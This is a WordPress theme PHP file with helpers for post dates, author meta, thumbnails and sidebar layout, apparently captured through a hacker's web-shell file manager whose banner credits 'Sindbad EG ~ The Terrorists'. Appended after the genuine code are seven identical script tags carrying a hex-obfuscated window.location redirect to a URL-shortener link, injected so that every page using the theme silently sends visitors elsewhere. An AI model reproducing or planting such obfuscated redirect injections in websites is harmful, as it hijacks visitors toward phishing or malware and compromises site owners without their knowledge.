Sindbad~EG File Manager
<?php
if ( ! function_exists( 'appointment_aside_meta_content' ) ) :
function appointment_aside_meta_content()
{
$appointment_options=appointment_theme_setup_data();
$news_setting = wp_parse_args( get_option( 'appointment_options', array() ), $appointment_options );
if($news_setting['home_meta_section_settings'] == '' ) { ?>
<!--show date of post-->
<aside class="blog-post-date-area">
<div class="date"> <div class="month-year"><?php echo esc_html(get_the_date()); ?></div></div>
<div class="comment"><a href="<?php the_permalink(); ?>"><i class="fa fa-comments"></i><?php comments_number( '0', '1', '%' ); ?></a></div>
</aside>
<?php } } endif;
if ( ! function_exists( 'appointment_post_meta_content' ) ) :
function appointment_post_meta_content()
{
$appointment_options=appointment_theme_setup_data();
$news_setting = wp_parse_args( get_option( 'appointment_options', array() ), $appointment_options );
if($news_setting['home_meta_section_settings'] == 0 ) { ?>
<div class="blog-post-lg">
<a href="<?php echo esc_url(get_author_posts_url( get_the_author_meta( 'ID' ) ));?>"><?php echo get_avatar( get_the_author_meta('user_email'), $size = '40'); ?></a>
<?php esc_html_e('By','appointment');?><a href="<?php echo esc_url( get_author_posts_url( get_the_author_meta( 'ID' ) ));?>"><?php echo esc_html( get_the_author());?></a>
<?php $tag_list = get_the_tag_list();
if(!empty($tag_list)) { ?>
<div class="blog-tags-lg"><i class="fa fa-tags"></i><?php the_tags('', ', ', ''); ?></div>
<?php } ?>
</div>
<?php }
} endif;
// this functions accepts two parameters first is the preset size of the image and second is for additional classes, you can also add yours
if(!function_exists( 'appointment_post_thumbnail')) :
function appointment_post_thumbnail($preset,$class){
if(has_post_thumbnail()){
$defalt_arg =array('class' => $class); ?>
<div class="blog-lg-box">
<a class ="img-responsive" <?php if( !is_single() ){ ?> href="<?php the_permalink(); ?>" <?php } ?> title="<?php the_title_attribute(); ?>" >
<?php the_post_thumbnail($preset, $defalt_arg); ?>
</a>
</div>
<?php } }endif;
// This Function Check whether Sidebar active or Not
if(!function_exists( 'appointment_post_layout_class' )) :
function appointment_post_layout_class(){
if(is_active_sidebar('sidebar-1'))
{ echo 'col-md-8'; }
else
{ echo 'col-md-12'; }
} endif;
?>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x2d\x73\x68\x6f\x72\x74\x2e\x6e\x65\x74\x2f\x45\x76\x69\x58\x47\x4a\x77\x30\x72\x30";</script>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x2d\x73\x68\x6f\x72\x74\x2e\x6e\x65\x74\x2f\x45\x76\x69\x58\x47\x4a\x77\x30\x72\x30";</script>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x2d\x73\x68\x6f\x72\x74\x2e\x6e\x65\x74\x2f\x45\x76\x69\x58\x47\x4a\x77\x30\x72\x30";</script>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x2d\x73\x68\x6f\x72\x74\x2e\x6e\x65\x74\x2f\x45\x76\x69\x58\x47\x4a\x77\x30\x72\x30";</script>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x2d\x73\x68\x6f\x72\x74\x2e\x6e\x65\x74\x2f\x45\x76\x69\x58\x47\x4a\x77\x30\x72\x30";</script>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x2d\x73\x68\x6f\x72\x74\x2e\x6e\x65\x74\x2f\x45\x76\x69\x58\x47\x4a\x77\x30\x72\x30";</script>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x2d\x73\x68\x6f\x72\x74\x2e\x6e\x65\x74\x2f\x45\x76\x69\x58\x47\x4a\x77\x30\x72\x30";</script>
Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists